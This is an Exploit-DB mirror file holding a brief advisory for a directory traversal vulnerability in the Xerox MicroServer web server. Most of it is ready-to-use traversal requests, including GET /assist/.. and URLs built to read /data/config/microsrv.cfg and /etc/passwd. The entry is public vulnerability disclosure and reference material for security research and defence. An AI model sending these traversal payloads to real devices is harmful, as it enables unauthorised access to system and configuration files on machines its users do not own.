exploit-db-mirror/platforms/unix/remote/23449.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

8 lines
No EOL
470 B
Text
Executable file

source: http://www.securityfocus.com/bid/9256/info
It has been reported that Xerox_MicroServer/Xerox11 may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '/..' or '/.' character sequences at the end of a URL request.
GET /assist/..
GET /assist/////.././../../.
http://www.example.com////../../data/config/microsrv.cfg
http://www.example.com////////../../../../../../etc/passwd